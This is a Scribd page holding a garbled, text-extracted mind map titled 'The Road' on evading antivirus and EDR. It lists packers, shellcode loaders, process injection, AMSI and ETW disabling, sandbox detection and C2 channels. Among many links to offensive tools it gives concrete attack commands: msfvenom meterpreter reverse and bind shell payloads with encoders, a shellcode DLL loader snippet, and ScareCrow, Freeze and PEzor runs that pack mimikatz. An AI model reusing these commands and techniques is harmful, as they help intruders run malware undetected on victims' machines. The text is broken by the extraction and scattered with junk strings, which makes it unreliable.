Scribd
Upload
87 views1 page

The Road

The document discusses various techniques for bypassing anti-virus software such as packing, polymorphism, signature hiding, ROP, and hooking control flow guard. It provides links to external resources explaining these techniques in more detail.

Uploaded by

steproclaster
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
87 views1 page

The Road

The document discusses various techniques for bypassing anti-virus software such as packing, polymorphism, signature hiding, ROP, and hooking control flow guard. It provides links to external resources explaining these techniques in more detail.

Uploaded by

steproclaster
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 1

‎with suspended

‎Packing ‎https://pentester.blog/?p=39 ‎CRT


‎ ttps://damonmohammadbagher.medium.com/
h
‎bypassing-anti-virus-by-creating-remote-thread-
‎Polymorph ‎https://www.exploit-db.com/papers/13874
‎into-target-process-45f145b2ac7a

‎ ttps://www.ired.team/offensive-security/
h
‎Signature hiding ‎defense-evasion/av-bypass-with-metasploit- ‎ ttps://subscription.packtpub.com/book/
h
‎templates ‎security/9781789610789/8/ch08lvl1sec50/
‎executing-the-inject-code-using-apc-queuing
‎ ttps://improsec.com/tech-blog/bypassing-
h
‎ROP
‎control-flow-guard-on-windows-10-part-ii ‎ ttps://github.com/LloydLabs/
h
‎APC (Asyncronous Procedure Call)
‎ntqueueapcthreadex-ntdll-gadget-injection
‎ ttps://joshpitts.medium.com/hooking-control-
h
‎flow-guard-cfg-for-fun-and-profit- ‎ ttps://decoded.avast.io/janvojtesek/raspberry-
h
‎31f951485545 ‎robins-roshtyak-a-little-lesson-in-trickery/
‎CFG
‎ ttps://citeseerx.ist.psu.edu/document?repid=
h
‎rep1&type=pdf&doi= ‎ ttps://www.ired.team/offensive-security/code-
h
‎ade1cc22ee994c1b353326ae4cedccd29f33b8d ‎injection-process-injection/process-hollowing-
‎0 ‎and-pe-image-relocations#relocation
‎Static ‎Process hollowing
‎CFG flattening ‎http://ac.inf.elte.hu/Vol_030_2009/003.pdf ‎ ttps://sevrosecurity.com/2020/04/08/
h
‎process-injection-part-1-createremotethread/
‎Pro tips : A shellcode sent in 3 open sources
‎ ttps://learn.microsoft.com/en-us/dotnet/
h
‎packer will have more chance to be caught than
‎Change logo/icon ‎csharp/language-reference/compiler-options/
‎a manual obfuscation ‎ ttps://attack.mitre.org/techniques/T1055/
h
‎resources?redirectedfrom=MSDN ‎Thread execution hijacking
‎003/

‎Change date of compilation

fdsfsdfs ‎https://github.com/TheD1rkMtr/D1rkLrd
‎ ttps://rastamouse.me/memory-patching-amsi-
h
‎PSC (Ptrace System Calls)

‎bypass/
‎https://github.com/xuanxuan0/DripLoader ‎ ttps://thehackernews.com/2017/12/malware-
h
‎C++ ‎Process Doppelganging
sec.co.uk/2018/06/exploring- ‎process-doppelganging.html
https://github.com/Hagrid29/PELoaderBypass AMSI -and-logging-evasion/

‎ ttps://disman.tl/2015/01/30/an-improved-
h
‎ ttps://www.pentestpartners.com/security-
h ‎Reflective dll injection
‎reflective-dll-injection-technique.html
‎blog/patchless-amsi-bypass-using-sharpblock/
‎python ‎https://github.com/icyguider/Shhhloader ‎https://github.com/fancycode/MemoryModule
‎Description


‎https://github.com/cribdragg3r/Alaris
‎C2 by DNS ‎Dll injection ‎https://www.ired.team/offensive-security/code-
‎injection-process-injection/dll-injection
‎C ‎https://github.com/trustedsec/COFFLoader
‎Network ‎P2P (hide ip from C2)
‎ ttps://book.hacktricks.xyz/windows-
h
‎ ttps://github.com/CMEPW/Selha/blob/main/
h ‎DLL Sideloading & Proxying ‎hardening/windows-av-bypass#dll-sideloading-
‎C/aes-loader-stageless.c ‎HTTPS
‎and-proxying
‎ ttps://medium.com/@merasor07/av-edr-
h
‎https://github.com/aeverj/NimShellCodeLoader ‎evasion-using-direct-system-calls-user-mode- ‎ ou put your region in RW, you write your
Y
‎Nim ‎vs-kernel-mode-fad2fdfed01a ‎shellcode, then you reprotect in RX, then you
‎Direct syscalls ‎RWX
‎ ttps://github.com/sh3d0ww01f/nim_
h ‎run the thread. This way your region is never in
‎shellloader ‎https://thewover.github.io/Dynamic-Invoke/ ‎rwx

‎ ttps://www.purpl3f0xsecur1ty.tech/2021/03/
h
‎https://github.com/EddieIvan01/gld ‎WaitForSingleObjectEx
‎30/av_evasion.html ‎ ttps://www.mdsec.co.uk/2022/04/process-
h
‎Go ‎dynamic ‎injection-via-component-object-model-com-
‎https://github.com/zha0gongz1/DesertFox ‎Foliage ‎irundowndocallback/
‎COM Hijack ‎Dll
‎https://evasions.checkpoint.com/techniques/
‎Delayed execution ‎https://0xpat.github.io/Abusing_COM_Objects/
‎ small sleep obfuscation technique that uses
A ‎timing.html#delayed-execution
‎https://github.com/b1tg/rs_shellcode ‎Ekko
‎CreateTimerQueueTimer Win32 API ‎Exe
‎ ttps://github.com/S4ntiagoP/donut/tree/
h
‎Rust ‎https://github.com/r4ime/shellcode_loader ‎ ttps://www.cyberbit.com/blog/endpoint-
h ‎syscalls
‎ ttps://github.com/janoglezcampos/
h
‎Remote thread ‎security/malware-mitigation-when-direct-
dfsdfsf
‎https://github.com/cr7pt0pl4gu3/Pestilence
‎Deathsleep
‎DeathSleep
‎system-calls-are-used/
‎Hta

‎ https://blog.securityevaluators.com/creating-
< ‎ ttps://github.com/hasherezade/pe_to_
h
‎C++ dsec.co.uk/2020/03/hiding-
‎av-resistant-malware-part-1-7604b83ea0c0 ‎shellcode ‎Cpl

‎Crystal
OH FFWKLFWFWFW ‎User APC
‎ ttps://www.cyberbit.com/endpoint-security/
h
‎malware-mitigation-when-direct-system-calls-
‎C ‎https://github.com/reveng007/ReflectiveNtdll TheWover/DInvoke ‎are-used/ ‎https://github.com/monoxgas/sRDI ‎Link

‎Bypass AV/EDR ‎Dropper ‎Manual loader ‎Automatic loader ‎Generate shellcode ‎Manual obfuscation ‎Automatic obfuscation ‎Process injection ‎Detect virtual machines (Sandbox) ‎From PE to shellcode ‎From alive beacon ‎Extensions

‎ include <iostream>
# ‎ sfvenom -p windows/x64/meterpreter/
m ‎https://github.com/sevagas/macro_pack ‎Count processus number ‎if >=40 its probably not a VM ‎Havoc ‎dotnet (object file)
‎#include <Windows.h> ‎reverse_tcp LHOST=<SERVER> LPORT=< ‎Office macro
‎ ‎PORT> -f raw ‎https://github.com/optiv/Ivy ‎User interaction ‎Send MessageBoxW
‎int main(void) { ‎From .net to BoF ‎https://github.com/CCob/BOF.NET
.‎ 1 allocating memory
‎.2 moving shellcode into that memory ‎ HMODULE hMod = LoadLibrary("shellcode. ‎ sfvenom -p windows/meterpreter/reverse_
m ‎https://github.com/phra/PEzor ‎Software ‎Check for internet ‎Cobalt ‎BoF (Beacon object file)
‎dll"); ‎msfvenom ‎tcp LHOST=127.0.0.1 --encrypt rc4 --encrypt- ‎ ttps://github.com/trustedsec/CS-Situational-
h
‎.3 executing the shellcode ‎C
‎ if (hMod == nullptr) { ‎key thisisakey -f dll ‎Awareness-BOF
‎https://github.com/klezVirus/inceptor ‎Datetime on compilation
‎ cout << "Failed to load shellcode.dll" << endl;
‎} ‎ sfvenom -p windows/meterpreter/bind_tcp -e
m ‎Packing ‎https://github.com/govolution/avet ‎Check for Computer name ‎VM = DESKTOP-[0-9A-Z]{7}
‎ ‎x86/shikata_ga_nai '\x00' -i 30 RHOST=10.0.0.
‎ return 0; ‎68 LPORT=9050 -f c | tr -d '"' | tr -d '\n' | more ‎https://github.com/Nariod/RustPacker
‎} ‎ ttps://github.com/CMEPW/bof-collection/
h
‎CPUID timing
‎blob/main/src/checkVM/checkVM2.c
‎C2 (Cobalt/Havoc what ever) ‎ ttps://github.com/DavidBuchanan314/
h
‎@Jenaye_fr  ‎ ttps://medium.com/securebit/bypassing-av-
h ‎monomorph ‎Hardware
‎ ypical user workstation has a processor with
T
‎through-metasploit-loader-64-bit-
‎LeDocteurDesBits ‎at least 2 cores, a minimum of 2 GB of RAM
‎9abe55e3e0c8 ‎ ttps://nytrosecurity.com/2019/06/30/writing-
h ‎https://github.com/upx/upx
‎C++ ‎ASM ‎and a 100 GB hard drive
‎Crédits ‎shellcodes-for-windows-x64/
‎michmich1000  ‎ ttps://github.com/ReversingID/Shellcode-
h ‎https://github.com/EgeBalci/sgn/
‎Loader/tree/master/windows ‎ ttps://evasions.checkpoint.com/techniques/
h
‎@Zabannn ‎ ine hyperion.exe /root/payloads/shellter/
w ‎OSX
‎Hyperion ‎https://github.com/CCob/SharpBlock ‎macos.html#macos-sandbox-methods
‎shellter_putty_reverse_x86.exe
‎ ttps://sevrosecurity.com/2019/05/25/bypass-
h
‎.NET ‎ ttps://github.com/danielbohannon/Invoke-
h
‎windows-defender-with-a-simple-shell-loader/ ‎Tools ‎https://github.com/a0rtega/pafish
‎ ttps://vxug.fakedoma.in/papers/VXUG/
h ‎Obfuscation
‎Static ‎AMSI Bypass
‎Exclusive/
‎C
‎FromaCprojectthroughassemblytoshellcodeHas ‎https://github.com/klezVirus/Chameleon
‎herezade.pdf
‎ taged and stageless
S ‎https://github.com/tokyoneon/Chimera
‎By definition, when we talk about staged we are
‎referring to a payload in addition to a piece This ‎ careCrow -I /Path/To/ShellCode -d facebook.
S
‎https://github.com/optiv/ScareCrow
‎means that there will be several actions (often ‎com
‎2) between the client and the server. ‎Signature hiding
‎ ‎https://github.com/paranoidninja/CarbonCopy
‎If you use meterpreter, please use the following
‎commands ‎ ttps://gist.github.com/snovvcrash/
h
‎ ‎LOLBIN ‎RemComSvc
‎123945e8f06c7182769846265637fedb
‎set EnableStageEncoding true;
‎set StageEncoder x64/xor_dynamic; ‎Entropy ‎https://github.com/kleiton0x00/Shelltropy

‎https://github.com/optiv/ScareCrow

‎ ttps://gist.github.com/tandasat/
h
‎e595c77c52e13aaee60e1e8b65d2ba32
‎Disable ETW

‎https://github.com/Soledge/BlockEtw

‎https://github.com/CCob/SharpBlock

‎ reeze -I /PathToShellcode -encrypt -sandbox -


F
‎https://github.com/optiv/Freeze
‎o packed.exe
Type your text ‎ Ezor.sh -sgn -unhook -antidebug -text -
P
‎https://github.com/phra/PEzor ‎syscalls -sleep=120 mimikatz/x64/mimikatz.
‎exe -z 2
‎Dynamic ‎Indirect syscall
‎https://github.com/optiv/ScareCrow

‎https://github.com/klezVirus/SysWhispers3

‎https://github.com/jthuraisamy/SysWhispers2

‎Disable AV ‎https://github.com/APTortellini/unDefender

‎Block DLL ‎https://github.com/CCob/SharpBlock

‎Detect virtual machines ‎https://github.com/a0rtega/pafish

You might also like